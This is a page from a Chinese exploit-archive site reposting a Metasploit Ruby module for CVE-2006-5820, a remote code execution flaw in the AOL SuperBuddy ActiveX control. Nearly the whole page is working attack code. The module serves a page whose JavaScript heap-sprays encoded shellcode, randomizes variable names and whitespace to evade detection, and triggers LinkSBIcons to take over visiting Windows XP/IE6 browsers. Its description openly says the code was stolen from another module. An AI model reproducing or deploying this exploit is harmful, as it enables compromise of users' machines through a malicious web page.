首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)
来源:www.vfocus.net 作者:kradchad 发布时间:2007-04-05  
require 'msf/core'

module Msf

class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote

include Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name'           => 'AOL Sb.Superbuddy vulnerability',
'Description'    => %q{
This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
},
'License'        => MSF_LICENSE,
'Author'         =>
[
'kradchad',
'leetpete'
],
'Version'        => '0.1',
'References'     =>
[
[ 'CVE', 'CVE-2006-5820']
],
'Payload'        =>
{
'Space'          => 1024,
'BadChars'       => "\x00",

},
'Platform'       => 'win',
'Targets'        =>
[
['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget'  => 0))
end

def autofilter
false
end

def on_request_uri(cli, request)

# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Get a unicode friendly version of the return address
addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

# Randomize the javascript variable names
var_buffer    = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape  = rand_text_alpha(rand(30)+2)
var_x         = rand_text_alpha(rand(30)+2)
var_i         = rand_text_alpha(rand(30)+2)
var_tic       = rand_text_alpha(rand(30)+2)
var_toc       = rand_text_alpha(rand(30)+2)

# Randomize HTML data
html          = rand_text_alpha(rand(30)+2)

# Build out the message
content = %Q|
<html>
<head>
<script>
try {

var #{var_unescape}  = unescape ;
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;

var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
}


   var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );
try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }


} catch( e ) { window.location = 'about:blank' ; }

</script>
</head>
<body>
#{html}
</body>
</html>
|

# Randomize the whitespace in the document
content.gsub!(/\s+/) do |s|
len = rand(100)+2
set = "\x09\x20\x0d\x0a"
buf = ''

while (buf.length < len)
buf << set[rand(set.length)].chr
end

buf
end

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response_html(cli, content)
end

end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Mercury Quality Center Spid
·Mutant 0.9.2 mutant_functions.
·CyBoards PHP Lite 1.21 (script
·phpMyNewsletter <= 0.8 (beta5)
·MS Windows Animated Cursor (.A
·Wserve HTTP Server 4.6 (Long D
·MyBulletinBoard (MyBB) <= 1.2.
·MS Windows Explorer Unspecifie
·HP Mercury Quality Center 9.0
·phpwind 5.x exploits
·Xoops Module PopnupBlog <= 2.5
·phpwind5.x passport_client.php
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved